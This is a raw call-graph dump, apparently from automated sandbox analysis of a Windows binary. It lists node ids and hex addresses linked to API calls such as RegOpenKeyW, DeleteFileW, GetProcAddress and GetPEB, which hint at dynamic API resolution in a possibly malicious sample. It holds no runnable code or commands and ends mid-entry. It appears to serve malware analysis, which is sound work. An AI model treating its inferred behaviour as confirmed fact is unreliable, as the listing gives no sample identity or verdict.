8390->8391 8391->8377 8393 40a0f0 8392->8393 8394 4031e5 4 API calls 8393->8394 8396 40a110 8394->8396 8395 40a134 8395->8399 8454 408b2c 8395->8454 8396->8395 8397 4031e5 4 API calls 8396->8397 8397->8395 8399->8374 8399->8377 8401 402b7c 2 API calls 8400->8401 8402 4056cd 8401->8402 8403 4056d4 8402->8403 8404 402b7c 2 API calls 8402->8404 8405 408c4d 8403->8405 8404->8403 8406 413ba4 6 API calls 8405->8406 8407 408c5c 8406->8407 8408 408f02 8407->8408 8409 408f3a 8407->8409 8412 40903e 8407->8412 8411 405b6f 6 API calls 8408->8411 8410 405b6f 6 API calls 8409->8410 8426 408f51 8410->8426 8413 408f0c 8411->8413 8428 413aca 8412->8428 8413->8412 8417 408f31 8413->8417 8457 40a1b6 8413->8457 8415 405b6f 6 API calls 8415->8426 8416 402bab 2 API calls 8416->8412 8417->8416 8419 409031 8420 402bab 2 API calls 8419->8420 8420->8417 8421 409022 8422 402bab 2 API calls 8421->8422 8423 409028 8422->8423 8424 402bab 2 API calls 8423->8424 8424->8417 8425 402bab GetProcessHeap HeapFree 8425->8426 8426->8412 8426->8415 8426->8417 8426->8419 8426->8421 8426->8425 8427 40a1b6 14 API calls 8426->8427 8491 4044ee 8426->8491 8427->8426 8429 409451 8428->8429 8430 413ad7 8428->8430 8438 405695 8429->8438 8431 405781 4 API calls 8430->8431 8432 413af0 8431->8432 8433 405781 4 API calls 8432->8433 8434 413afe 8433->8434 8435 405762 4 API calls 8434->8435 8436 413b0e 8435->8436 8436->8429 8437 405781 4 API calls 8436->8437 8437->8429 8439 4056a0 8438->8439 8440 4056b9 8438->8440 8441 402bab 2 API calls 8439->8441 8440->8337 8442 4056b3 8441->8442 8443 402bab 2 API calls 8442->8443 8443->8440 8445 40a39a 8444->8445 8446 40a368 8444->8446 8447 4031e5 4 API calls 8445->8447 8449 40a3af 8445->8449 8450 4031e5 4 API calls 8446->8450 8447->8449 8448 40a3ca 8452 40a38a 8448->8452 8453 408b2c 4 API calls 8448->8453 8449->8448 8451 408b2c 4 API calls 8449->8451 8450->8452 8451->8448 8452->8326 8453->8452 8455 4031e5 4 API calls 8454->8455 8456 408b3e 8455->8456 8456->8399 8458 40a202 8457->8458 8459 40a1c3 8457->8459 8613 405f08 8458->8613 8460 405b6f 6 API calls 8459->8460 8463 40a1d0 8460->8463 8462 40a1fc 8462->8417 8463->8462 8466 40a1f3 8463->8466 8501 40a45b 8463->8501 8465 40a333 8467 402bab 2 API calls 8465->8467 8469 402bab 2 API calls 8466->8469 8467->8462 8469->8462 8470 405b6f 6 API calls 8472 40a245 8470->8472 8471 40a25d 8473 405b6f 6 API calls 8471->8473 8472->8471 8474 413a58 13 API calls 8472->8474 8479 40a26b 8473->8479 8475 40a257 8474->8475 8478 402bab 2 API calls 8475->8478 8476 40a28b 8477 405b6f 6 API calls 8476->8477 8484 40a297 8477->8484 8478->8471 8479->8476 8480 40a284 8479->8480 8620 40955b 8479->8620 8482 402bab 2 API calls 8480->8482 8482->8476 8483 405b6f 6 API calls 8488 40a2b7 8483->8488 8485 40a2b0 8484->8485 8484->8488 8627 40968e 8484->8627 8486 402bab 2 API calls 8485->8486 8486->8488 8488->8465 8488->8483 8490 402bab 2 API calls 8488->8490 8637 4098a7 8488->8637 8490->8488 8492 402b7c 2 API calls 8491->8492 8493 404512 8492->8493 8495 404585 GetLastError 8493->8495 8496 402bab 2 API calls 8493->8496 8499 40457c 8493->8499 8500 402b7c 2 API calls 8493->8500 8892 4044a7 8493->8892 8497 404592 8495->8497 8495->8499 8496->8493 8498 402bab 2 API calls 8497->8498 8498->8499 8499->8426 8500->8493 8646 40642c 8501->8646 8503 40a469 8504 40c4ff 8503->8504 8649 4047e6 8503->8649 8504->8466 8507 4040bb 12 API calls 8508 40bf88 8507->8508 8508->8504 8509 403c90 8 API calls 8508->8509 8510 40bfaa 8509->8510 8511 402b7c 2 API calls 8510->8511 8513 40bfc1 8511->8513 8512 40c4f3 8514 403f9e 5 API calls 8512->8514 8515 40c3aa 8513->8515 8656 40a423 8513->8656 8514->8504 8515->8512 8518 4056bf 2 API calls 8515->8518 8521 40c4e3 8515->8521 8516 402bab 2 API calls 8516->8512 8520 40c3d2 8518->8520 8520->8521 8523 4040bb 12 API calls 8520->8523 8521->8516 8522 405f08 4 API calls 8524 40c005 8522->8524 8525 40c3f3 8523->8525 8526 40c021 8524->8526 8659 40a43f 8524->8659 8528 40c4d1 8525->8528 8716 405a52 8525->8716 8527 4031e5 4 API calls 8526->8527 8530 40c034 8527->8530 8533 413aca 4 API calls 8528->8533 8539 4031e5 4 API calls 8530->8539 8534 40c4dd 8533->8534 8537 405695 2 API calls 8534->8537 8535 40c411 8721 405a87 8535->8721 8536 402bab 2 API calls 8536->8526 8537->8521 8545 40c04d 8539->8545 8540 40c4b3 8541 402bab 2 API calls 8540->8541 8543 40c4cb 8541->8543 8542 405a52 4 API calls 8553 40c423 8542->8553 8544 403f9e 5 API calls 8543->8544 8544->8528 8547 4031e5 4 API calls 8545->8547 8546 405a87 4 API calls 8546->8553 8548 40c085 8547->8548 8550 4031e5 4 API calls 8548->8550 8549 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8549->8553 8551 40c09c 8550->8551 8554 4031e5 4 API calls 8551->8554 8552 402bab 2 API calls 8552->8553 8553->8540 8553->8542 8553->8546 8553->8549 8553->8552 8555 40c0b3 8554->8555 8556 4031e5 4 API calls 8555->8556 8557 40c0ca 8556->8557 8558 4031e5 4 API calls 8557->8558 8559 40c0e7 8558->8559 8560 4031e5 4 API calls 8559->8560 8561 40c100 8560->8561 8562 4031e5 4 API calls 8561->8562 8563 40c119 8562->8563 8564 4031e5 4 API calls 8563->8564 8565 40c132 8564->8565 8566 4031e5 4 API calls 8565->8566 8567 40c14b 8566->8567 8568 4031e5 4 API calls 8567->8568 8569 40c164 8568->8569 8570 4031e5 4 API calls 8569->8570 8571 40c17d 8570->8571 8572 4031e5 4 API calls 8571->8572 8573 40c196 8572->8573 8574 4031e5 4 API calls 8573->8574 8575 40c1af 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c1c8 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c1de 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c1f4 8580->8581 8582 4031e5 4 API calls 8581->8582 8583 40c20d 8582->8583 8584 4031e5 4 API calls 8583->8584 8585 40c226 8584->8585 8586 4031e5 4 API calls 8585->8586 8587 40c23f 8586->8587 8588 4031e5 4 API calls 8587->8588 8589 40c258 8588->8589 8590 4031e5 4 API calls 8589->8590 8591 40c273 8590->8591 8592 4031e5 4 API calls 8591->8592 8593 40c28a 8592->8593 8594 4031e5 4 API calls 8593->8594 8597 40c2d5 8594->8597 8595 40c3a2 8596 402bab 2 API calls 8595->8596 8596->8515 8597->8595 8598 4031e5 4 API calls 8597->8598 8599 40c315 8598->8599 8600 40c38b 8599->8600 8662 404866 8599->8662 8601 403c40 5 API calls 8600->8601 8603 40c397 8601->8603 8605 403c40 5 API calls 8603->8605 8605->8595 8606 40c382 8608 403c40 5 API calls 8606->8608 8608->8600 8610 406c4c 6 API calls 8611 40c355 8610->8611 8611->8606 8686 4126a7 8611->8686 8614 4031e5 4 API calls 8613->8614 8615 405f1d 8614->8615 8616 405f55 8615->8616 8617 402b7c 2 API calls 8615->8617 8616->8462 8616->8465 8616->8470 8616->8471 8618 405f36 8617->8618 8618->8616 8619 4031e5 4 API calls 8618->8619 8619->8616 8621 409673 8620->8621 8626 40956d 8620->8626 8621->8480 8622 408b45 6 API calls 8622->8626 8623 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8623->8626 8624 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8624->8626 8625 402bab GetProcessHeap HeapFree 8625->8626 8626->8621 8626->8622 8626->8623 8626->8624 8626->8625 8628 4040bb 12 API calls 8627->8628 8636 4096a9 8628->8636 8629 40989f 8629->8485 8630 409896 8631 403f9e 5 API calls 8630->8631 8631->8629 8633 408b45 6 API calls 8633->8636 8634 402bab GetProcessHeap HeapFree 8634->8636 8635 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8635->8636 8636->8629 8636->8630 8636->8633 8636->8634 8636->8635 8885 4059d8 8636->8885 8638 4040bb 12 API calls 8637->8638 8644 4098c1 8638->8644 8639 4099fb 8639->8488 8640 4099f3 8641 403f9e 5 API calls 8640->8641 8641->8639 8642 4059d8 4 API calls 8642->8644 8643 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8643->8644 8644->8639 8644->8640 8644->8642 8644->8643 8645 402bab GetProcessHeap HeapFree 8644->8645 8645->8644 8647 4031e5 4 API calls 8646->8647 8648 406441 GetNativeSystemInfo 8647->8648 8648->8503 8650 4031e5 4 API calls 8649->8650 8654 40480a 8650->8654 8651 40485d 8651->8504 8651->8507 8652 4031e5 4 API calls 8652->8654 8653 40484f 8655 403c40 5 API calls 8653->8655 8654->8651 8654->8652 8654->8653 8655->8651 8657 4031e5 4 API calls 8656->8657 8658 40a435 8657->8658 8658->8522 8660 4031e5 4 API calls 8659->8660 8661 40a451 8660->8661 8661->8536 8663 4031e5 4 API calls 8662->8663 8664 40487c 8663->8664 8664->8606 8665 406c4c 8664->8665 8726 4068eb 8665->8726 8667 406e02 8667->8610 8668 406cab 8738 40469b 8668->8738 8669 406c6c 8669->8667 8669->8668 8735 406894 8669->8735 8676 406df1 8677 40469b 4 API calls 8676->8677 8677->8667 8678 406cef 8678->8676 8679 4031e5 4 API calls 8678->8679 8680 406d26 8679->8680 8680->8676 8681 40771e 6 API calls 8680->8681 8685 406d57 8681->8685 8682 406da2 8683 4031e5 4 API calls 8682->8683 8683->8676 8685->8682 8751 4068b0 8685->8751 8687 4126bb 8686->8687 8688 4126d1 8686->8688 8689 412840 8687->8689 8807 40488c 8687->8807 8688->8689 8813 407055 8688->8813 8689->8606 8693 412837 8695 403c40 5 API calls 8693->8695 8695->8689 8697 41281e 8698 4070ff 6 API calls 8697->8698 8698->8693 8699 407055 6 API calls 8700 412742 8699->8700 8700->8697 8701 40719a 6 API calls 8700->8701 8702 41276e 8701->8702 8703 412804 8702->8703 8829 406f4a 8702->8829 8857 4070ff 8703->8857 8706 41279a 8835 412553 8706->8835 8879 405907 8716->8879 8718 405a61 8719 405a76 8718->8719 8720 405907 4 API calls 8718->8720 8719->8535 8720->8718 8722 402b7c 2 API calls 8721->8722 8724 405a99 8722->8724 8725 405ade 8724->8725 8882 40595e 8724->8882 8725->8553 8754 4076a8 8726->8754 8728 406913 8729 406a61 8728->8729 8730 40771e 6 API calls 8728->8730 8729->8669 8734 406949 8730->8734 8731 40771e 6 API calls 8731->8734 8732 404678 4 API calls 8732->8734 8734->8729 8734->8731 8734->8732 8760 4046c2 8734->8760 8736 4031e5 4 API calls 8735->8736 8737 4068a6 8736->8737 8737->8669 8739 4046b4 8738->8739 8740 4046a4 8738->8740 8739->8667 8742 404678 8739->8742 8741 4031e5 4 API calls 8740->8741 8741->8739 8743 4031e5 4 API calls 8742->8743 8744 40468b 8743->8744 8744->8667 8745 40771e 8744->8745 8746 407737 8745->8746 8750 407748 8745->8750 8747 407644 6 API calls 8746->8747 8748 407741 8747->8748 8749 406baa 6 API calls 8748->8749 8749->8750 8750->8678 8752 4031e5 4 API calls 8751->8752 8753 4068c2 8752->8753 8753->8685 8755 4076c1 8754->8755 8759 4076d2 8754->8759 8768 407644 8755->8768 8759->8728 8761 4046d3 8760->8761 8762 4046d9 8760->8762 8803 40464c 8761->8803 8765 4046e9 8762->8765 8766 404678 4 API calls 8762->8766 8764 404714 8764->8734 8765->8764 8767 40469b 4 API calls 8765->8767 8766->8765 8767->8764 8769 407653 8768->8769 8770 407661 8768->8770 8769->8770 8776 406a6b 8769->8776 8772 406baa 8770->8772 8773 406bbb 8772->8773 8775 406bc8 8772->8775 8773->8775 8784 407402 8773->8784 8775->8759 8780 406a81 8776->8780 8777 402b7c 2 API calls 8777->8780 8778 406b8b 8778->8770 8779 406894 4 API calls 8779->8780 8780->8777 8780->8778 8780->8779 8781 406b96 8780->8781 8782 402bab 2 API calls 8780->8782 8783 402bab 2 API calls 8781->8783 8782->8780 8783->8778 8785 407644 6 API calls 8784->8785 8786 407412 8785->8786 8787 402b7c 2 API calls 8786->8787 8794 407450 8786->8794 8788 407483 8787->8788 8789 402b7c 2 API calls 8788->8789 8788->8794 8792 4074ce 8789->8792 8790 4074da 8791 4068cc 2 API calls 8790->8791 8791->8794 8792->8790 8793 402b7c 2 API calls 8792->8793 8797 40751f 8793->8797 8794->8775 8795 40752b 8796 4068cc 2 API calls 8795->8796 8796->8790 8797->8795 8799 4068cc 8797->8799 8800 4068d6 8799->8800 8801 4068e3 8799->8801 8800->8801 8802 402bab GetProcessHeap HeapFree 8800->8802 8801->8795 8802->8801 8804 404666 8803->8804 8805 404659 8803->8805 8804->8762 8806 4031e5 4 API calls 8805->8806 8806->8804 8808 4047e6 5 API calls 8807->8808 8809 404897 8808->8809 8810 40489c 8809->8810 8865 4047c7 8809->8865 8810->8688 8814 40706f 8813->8814 8815 407084 8813->8815 8814->8815 8816 407644 6 API calls 8814->8816 8820 4070e4 8815->8820 8868 406fd2 8815->8868 8817 40707d 8816->8817 8819 406baa 6 API calls 8817->8819 8819->8815 8820->8693 8821 40719a 8820->8821 8822 4071b0 8821->8822 8826 4071c5 8821->8826 8823 407644 6 API calls 8822->8823 8822->8826 8824 4071be 8823->8824 8825 406baa 6 API calls 8824->8825 8825->8826 8827 406fd2 4 API calls 8826->8827 8828 407226 8826->8828 8827->8828 8828->8697 8828->8699 8830 406f64 8829->8830 8834 406f75 8829->8834 8831 407644 6 API calls 8830->8831 8832 406f6e 8831->8832 8833 406baa 6 API calls 8832->8833 8833->8834 8834->8706 8876 4060ac 8835->8876 8858 407116 8857->8858 8859 40712b 8857->8859 8858->8859 8860 407644 6 API calls 8858->8860 8862 406fd2 4 API calls 8859->8862 8864 407187 8859->8864 8861 407124 8860->8861 8863 406baa 6 API calls 8861->8863 8862->8864 8863->8859 8864->8697 8866 4031e5 4 API calls 8865->8866 8867 4047d9 8866->8867 8867->8688 8869 406fde 8868->8869 8870 407027 8869->8870 8871 4031e5 4 API calls 8869->8871 8870->8820 8872 406ffa 8871->8872 8873 4031e5 4 API calls 8872->8873 8874 407011 8873->8874 8875 4031e5 4 API calls 8874->8875 8875->8870 8877 4031e5 4 API calls 8876->8877 8878 4060bb 8877->8878 8878->8878 8880 4031e5 4 API calls 8879->8880 8881 40591a 8880->8881 8881->8718 8883 4031e5 4 API calls 8882->8883 8884 405971 8883->8884 8884->8724 8886 4031e5 4 API calls 8885->8886 8887 4059ed 8886->8887 8888 402b7c 2 API calls 8887->8888 8891 405a38 8887->8891 8889 405a16 8888->8889 8890 4031e5 4 API calls 8889->8890 8889->8891 8890->8891 8891->8636 8893 4031e5 4 API calls 8892->8893 8894 4044b9 8893->8894 8894->8493 9814 40a349 9815 4098a7 13 API calls 9814->9815 9816 40a359 9815->9816 9053 408952 9074 40823f 9053->9074 9056 408960 9058 4056bf 2 API calls 9056->9058 9059 40896a 9058->9059 9102 408862 9059->9102 9061 413aca 4 API calls 9062 4089d4 9061->9062 9064 405695 2 API calls 9062->9064 9063 408975 9071 4089c4 9063->9071 9110 4087d6 9063->9110 9066 4089df 9064->9066 9071->9061 9072 402bab 2 API calls 9073 40899d 9072->9073 9073->9071 9073->9072 9075 40824d 9074->9075 9076 40831b 9075->9076 9077 4031e5 4 API calls 9075->9077 9076->9056 9090 4083bb 9076->9090 9078 40826d 9077->9078 9079 4031e5 4 API calls 9078->9079 9080 408289 9079->9080 9081 4031e5 4 API calls 9080->9081 9082 4082a5 9081->9082 9083 4031e5 4 API calls 9082->9083 9084 4082c1 9083->9084 9085 4031e5 4 API calls 9084->9085 9086 4082e2 9085->9086 9087 4031e5 4 API calls 9086->9087 9088 4082ff 9087->9088 9089 4031e5 4 API calls 9088->9089 9089->9076 9138 408363 9090->9138 9093 4056bf 2 API calls 9099 4083f4 9093->9099 9094 413aca 4 API calls 9095 4084a0 9094->9095 9096 405695 2 API calls 9095->9096 9097 4084ab 9096->9097 9097->9056 9098 408492 9098->9094 9099->9098 9141 40815d 9099->9141 9156 40805d 9099->9156 9171 404b8f 9102->9171 9104 408946 9104->9063 9105 40887e 9105->9104 9106 4031e5 4 API calls 9105->9106 9107 40893e 9105->9107 9109 402b7c 2 API calls 9105->9109 9106->9105 9174 404a39 9107->9174 9109->9105 9111 402b7c 2 API calls 9110->9111 9112 4087e7 9111->9112 9113 4031e5 4 API calls 9112->9113 9118 40885a 9112->9118 9116 408802 9113->9116 9114 408853 9115 402bab 2 API calls 9114->9115 9115->9118 9116->9114 9119 40884d 9116->9119 9183 408522 9116->9183 9187 4084b4 9116->9187 9122 408749 9118->9122 9190 4084d4 9119->9190 9123 404b8f 5 API calls 9122->9123 9127 408765 9123->9127 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9124 9127->9125 9127->9126 9129 4087cf 9127->9129 9128->9129 9130 4085d1 9129->9130 9131 4085e9 9130->9131 9133 4086c2 9130->9133 9131->9133 9134 402bab 2 API calls 9131->9134 9135 4031e5 4 API calls 9131->9135 9196 4089e6 9131->9196 9215 4086c9 9131->9215 9219 4036a3 9131->9219 9133->9073 9134->9131 9135->9131 9139 4031e5 4 API calls 9138->9139 9140 408386 9139->9140 9140->9093 9140->9097 9142 40816f 9141->9142 9143 4081b6 9142->9143 9144 4081fd 9142->9144 9155 4081ef 9142->9155 9146 405872 4 API calls 9143->9146 9145 405872 4 API calls 9144->9145 9148 408213 9145->9148 9147 4081cf 9146->9147 9149 405872 4 API calls 9147->9149 9150 405872 4 API calls 9148->9150 9151 4081df 9149->9151 9152 408222 9150->9152 9153 405872 4 API calls 9151->9153 9154 405872 4 API calls 9152->9154 9153->9155 9154->9155 9155->9099 9157 40808c 9156->9157 9158 4080d2 9157->9158 9159 408119 9157->9159 9170 40810b 9157->9170 9161 405872 4 API calls 9158->9161 9160 405872 4 API calls 9159->9160 9162 40812f 9160->9162 9163 4080eb 9161->9163 9165 405872 4 API calls 9162->9165 9164 405872 4 API calls 9163->9164 9166 4080fb 9164->9166 9167 40813e 9165->9167 9168 405872 4 API calls 9166->9168 9169 405872 4 API calls 9167->9169 9168->9170 9169->9170 9170->9099 9177 404a19 9171->9177 9173 404ba0 9173->9105 9180 4049ff 9174->9180 9176 404a44 9176->9104 9178 4031e5 4 API calls 9177->9178 9179 404a2c RegOpenKeyW 9178->9179 9179->9173 9181 4031e5 4 API calls 9180->9181 9182 404a12 RegCloseKey 9181->9182 9182->9176 9185 408534 9183->9185 9184 4085af 9184->9116 9185->9184 9193 4084ee 9185->9193 9188 4031e5 4 API calls 9187->9188 9189 4084c7 9188->9189 9189->9116 9191 4031e5 4 API calls 9190->9191 9192 4084e7 9191->9192 9192->9114 9194 4031e5 4 API calls 9193->9194 9195 408501 9194->9195 9195->9184 9197 4031e5 4 API calls 9196->9197 9198 408a06 9197->9198 9199 408b21 9198->9199 9200 4031e5 4 API calls 9198->9200 9199->9131 9202 408a32 9200->9202 9201 408b17 9231 403649 9201->9231 9202->9201 9222 403666 9202->9222 9206 4031e5 4 API calls 9208 408a88 9206->9208 9209 4031e5 4 API calls 9208->9209 9214 408b0e 9208->9214 9210 408ac4 9209->9210 9211 405b6f 6 API calls 9210->9211 9212 408aff 9211->9212 9212->9214 9225 408508 9212->9225 9228 40362f 9214->9228 9216 408744 9215->9216 9217 4086e2 9215->9217 9216->9131 9217->9216 9218 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9217->9218 9218->9217 9220 4031e5 4 API calls 9219->9220 9221 4036b5 9220->9221 9221->9131 9223 4031e5 4 API calls 9222->9223 9224 403679 9223->9224 9224->9206 9224->9214 9226 4031e5 4 API calls 9225->9226 9227 40851b 9226->9227 9227->9214 9229 4031e5 4 API calls 9228->9229 9230 403642 9229->9230 9230->9201 9232 4031e5 4 API calls 9231->9232 9233 40365c 9232->9233 9233->9199 9834 40f252 9835 404bee 6 API calls 9834->9835 9836 40f269 9835->9836 9837 404bee 6 API calls 9836->9837 9848 40f2ff 9836->9848 9838 40f282 9837->9838 9839 404bee 6 API calls 9838->9839 9840 40f290 9839->9840 9851 404c4e 9840->9851 9842 40f2a7 9843 405872 4 API calls 9842->9843 9842->9848 9844 40f2cd 9843->9844 9845 405872 4 API calls 9844->9845 9846 40f2dc 9845->9846 9847 405872 4 API calls 9846->9847 9849 40f2ee 9847->9849 9850 405762 4 API calls 9849->9850 9850->9848 9852 402b7c 2 API calls 9851->9852 9854 404c60 9852->9854 9853 404ca4 9853->9842 9854->9853 9855 4031e5 4 API calls 9854->9855 9856 404c8d 9855->9856 9856->9853 9857 402bab 2 API calls 9856->9857 9857->9853 9858 41045c 9859 4040bb 12 API calls 9858->9859 9860 410477 9859->9860 9861 41060b 9860->9861 9889 407851 9860->9889 9863 41048f 9865 407851 2 API calls 9863->9865 9869 410604 9863->9869 9864 403f9e 5 API calls 9864->9861 9866 4104a9 9865->9866 9871 4105e0 9866->9871 9872 405ae9 6 API calls 9866->9872 9874 41056f 9866->9874 9875 4105eb 9866->9875 9867 402bab 2 API calls 9867->9869 9868 402bab 2 API calls 9870 4105fb 9868->9870 9869->9864 9870->9867 9873 402bab 2 API calls 9871->9873 9871->9875 9872->9866 9873->9875 9874->9871 9876 4105d6 9874->9876 9878 412269 6 API calls 9874->9878 9875->9868 9875->9870 9877 402bab 2 API calls 9876->9877 9877->9871 9879 410580 9878->9879 9879->9876 9880 405872 4 API calls 9879->9880 9881 410599 9880->9881 9882 405872 4 API calls 9881->9882 9883 4105a9 9882->9883 9884 405872 4 API calls 9883->9884 9885 4105bb 9884->9885 9886 405872 4 API calls 9885->9886 9887 4105cd 9886->9887 9888 402bab 2 API calls 9887->9888 9888->9876 9890 407866 9889->9890 9891 402b7c 2 API calls 9890->9891 9892 407899 9890->9892 9891->9892 9892->9863 9295 40f561 9298 40f4b6 9295->9298 9299 413b28 6 API calls 9298->9299 9304 40f4bf 9299->9304 9300 405b6f 6 API calls 9300->9304 9301 402bab GetProcessHeap HeapFree 9301->9304 9302 413a58 13 API calls 9302->9304 9303 40f559 9304->9300 9304->9301 9304->9302 9304->9303 9308 403b64 9309 4031e5 4 API calls 9308->9309 9310 403b77 PathFileExistsW 9309->9310 9924 40d069 9925 404bee 6 API calls 9924->9925 9926 40d080 9925->9926 9927 404bee 6 API calls 9926->9927 9948 40d1e2 9926->9948 9928 40d099 9927->9928 9929 404bee 6 API calls 9928->9929 9930 40d0a7 9929->9930 9965 404ba7 9930->9965 9933 404bee 6 API calls 9934 40d0c5 9933->9934 9935 404c4e 6 API calls 9934->9935 9936 40d0dc 9935->9936 9937 404bee 6 API calls 9936->9937 9938 40d0eb 9937->9938 9939 404ba7 4 API calls 9938->9939 9940 40d0fa 9939->9940 9941 404bee 6 API calls 9940->9941 9942 40d109 9941->9942 9943 404c4e 6 API calls 9942->9943 9944 40d123 9943->9944 9945 405872 4 API calls 9944->9945 9944->9948 9946 40d14a 9945->9946 9947 405872 4 API calls 9946->9947 9949 40d159 9947->9949 9950 405872 4 API calls 9949->9950 9951 40d16b 9950->9951 9952 405781 4 API calls 9951->9952 9953 40d179 9952->9953 9954 405872 4 API calls 9953->9954 9955 40d18b 9954->9955 9956 405762 4 API calls 9955->9956 9957 40d19f 9956->9957 9958 405872 4 API calls 9957->9958 9959 40d1b1 9958->9959 9960 405781 4 API calls 9959->9960 9961 40d1bf 9960->9961 9962 405872 4 API calls 9961->9962 9963 40d1d1 9962->9963 9964 405762 4 API calls 9963->9964 9964->9948 9966 4031e5 4 API calls 9965->9966 9967 404bca 9966->9967 9967->9933 9337 40f16e 9338 4056bf 2 API calls 9337->9338 9339 40f17b 9338->9339 9340 412093 20 API calls 9339->9340 9341 40f19e 9340->9341 9342 412093 20 API calls 9341->9342 9343 40f1b6 9342->9343 9344 412093 20 API calls 9343->9344 9345 40f1cc 9344->9345 9346 412093 20 API calls 9345->9346 9347 40f1e2 9346->9347 9348 413aca 4 API calls 9347->9348 9349 40f1ef 9348->9349 9350 405695 2 API calls 9349->9350 9351 40f1fa 9350->9351 9352 40ce71 9353 413b28 6 API calls 9352->9353 9354 40ce78 9353->9354 9355 405b6f 6 API calls 9354->9355 9357 40ce83 9355->9357 9356 403fbf 7 API calls 9358 40cecc 9356->9358 9360 40ceba 9357->9360 9361 403d74 19 API calls 9357->9361 9365 40cec1 9357->9365 9359 40cefb 9358->9359 9363 403d74 19 API calls 9358->9363 9362 402bab 2 API calls 9360->9362 9364 40cead 9361->9364 9362->9365 9366 40cee7 9363->9366 9364->9360 9369 402bab 2 API calls 9364->9369 9365->9356 9367 40cef4 9366->9367 9370 402bab 2 API calls 9366->9370 9368 402bab 2 API calls 9367->9368 9368->9359 9369->9360 9370->9367 9371 406472 9372 4031e5 4 API calls 9371->9372 9373 406484 Sleep 9372->9373 10041 40f204 10042 405781 4 API calls 10041->10042 10043 40f214 10042->10043 10044 4057df 13 API calls 10043->10044 10045 40f226 10044->10045 9431 403c08 9432 4031e5 4 API calls 9431->9432 9433 403c1a DeleteFileW 9432->9433 9434 410a09 9435 41219c 14 API calls 9434->9435 9436 410a1b 9435->9436 9437 41219c 14 API calls 9436->9437 9438 410a23 9437->9438 9439 41219c 14 API calls 9438->9439 9440 410a2c 9439->9440 9441 41219c 14 API calls 9440->9441 9442 410a38 9441->9442 9443 404b22 6 API calls 9442->9443 9444 410a4c 9443->9444 9445 410a7a 9444->9445 9446 403fbf 7 API calls 9444->9446 9447 410a5c 9446->9447 9448 410a71 9447->9448 9449 413a58 13 API calls 9447->9449 9450 402bab 2 API calls 9448->9450 9451 410a6b 9449->9451 9450->9445 9452 402bab 2 API calls 9451->9452 9452->9448 10046 410d09 10047 410d56 10046->10047 10048 410d17 10046->10048 10050 413a58 13 API calls 10047->10050 10062 406642 10048->10062 10052 410d6f 10050->10052 10053 4056bf 2 API calls 10054 410d2e 10053->10054 10075 405641 10054->10075 10056 410d41 10057 413aca 4 API calls 10056->10057 10058 410d4a 10057->10058 10059 405695 2 API calls 10058->10059 10060 410d50 10059->10060 10061 4036a3 4 API calls 10060->10061 10061->10047 10063 406662 10062->10063 10064 4031e5 4 API calls 10063->10064 10065 406676 10064->10065 10079 4066bf 10065->10079 10070 4066b1 10073 4036a3 4 API calls 10070->10073 10071 4066a7 10072 4036a3 4 API calls 10071->10072 10074 4066ac 10072->10074 10073->10074 10074->10047 10074->10053 10076 40564d 10075->10076 10077 405673 10075->10077 10076->10077 10078 4056fc 4 API calls 10076->10078 10077->10056 10078->10077 10080 4031e5 4 API calls 10079->10080 10081 4066dc 10080->10081 10082 4066f6 SetLastError 10081->10082 10083 406708 GetLastError 10081->10083 10093 406693 10082->10093 10084 406713 10083->10084 10083->10093 10085 4031e5 4 API calls 10084->10085 10086 406725 10085->10086 10087 4031e5 4 API calls 10086->10087 10086->10093 10088 40673f 10087->10088 10089 406753 10088->10089 10090 406749 10088->10090 10092 4031e5 4 API calls 10089->10092 10091 4036a3 4 API calls 10090->10091 10091->10093 10094 406761 10092->10094 10101 406455 10093->10101 10095 40678a 10094->10095 10096 40677c 10094->10096 10098 4036a3 4 API calls 10095->10098 10097 4036a3 4 API calls 10096->10097 10099 406781 10097->10099 10098->10093 10100 4036a3 4 API calls 10099->10100 10100->10093 10102 4031e5 4 API calls 10101->10102 10103 406468 10102->10103 10103->10070 10103->10071 9453 40c509 9454 412093 20 API calls 9453->9454 9455 40c51e 9454->9455 9462 40910d 9463 404b22 6 API calls 9462->9463 9464 409124 9463->9464 9465 40917a 9464->9465 9466 405b6f 6 API calls 9464->9466 9467 40913e 9466->9467 9469 404b22 6 API calls 9467->9469 9474 409173 9467->9474 9468 402bab 2 API calls 9468->9465 9470 409153 9469->9470 9471 40916a 9470->9471 9473 409408 15 API calls 9470->9473 9472 402bab 2 API calls 9471->9472 9472->9474 9475 409164 9473->9475 9474->9468 9476 402bab 2 API calls 9475->9476 9476->9471 9480 410410 9481 4056bf 2 API calls 9480->9481 9482 41041b 9481->9482 9483 412093 20 API calls 9482->9483 9484 41043c 9483->9484 9485 413aca 4 API calls 9484->9485 9486 410449 9485->9486 9487 405695 2 API calls 9486->9487 9488 410454 9487->9488 9515 40c71a 9516 41219c 14 API calls 9515->9516 9517 40c728 9516->9517 10159 410b1a 10160 404bee 6 API calls 10159->10160 10162 410b31 10160->10162 10161 410c6d 10162->10161 10163 404bee 6 API calls 10162->10163 10164 410b5a 10163->10164 10165 404bee 6 API calls 10164->10165 10166 410b69 10165->10166 10167 404bee 6 API calls 10166->10167 10168 410b78 10167->10168 10169 404ba7 4 API calls 10168->10169 10170 410b86 10169->10170 10171 404ba7 4 API calls 10170->10171 10172 410b95 10171->10172 10172->10161 10173 405872 4 API calls 10172->10173 10174 410bd7 10173->10174 10175 405872 4 API calls 10174->10175 10176 410be8 10175->10176 10177 405872 4 API calls 10176->10177 10178 410bf9 10177->10178 10179 405781 4 API calls 10178->10179 10180 410c07 10179->10180 10181 405781 4 API calls 10180->10181 10185 410c15 10181->10185 10182 410c4e 10183 405762 4 API calls 10182->10183 10184 410c60 10183->10184 10184->10161 10186 403f9e 5 API calls 10184->10186 10185->10182 10192 405e5a 10185->10192 10186->10161 10189 4040bb 12 API calls 10190 410c44 10189->10190 10191 402bab 2 API calls 10190->10191 10191->10182 10193 402b7c 2 API calls 10192->10193 10194 405e72 10193->10194 10195 4031e5 4 API calls 10194->10195 10198 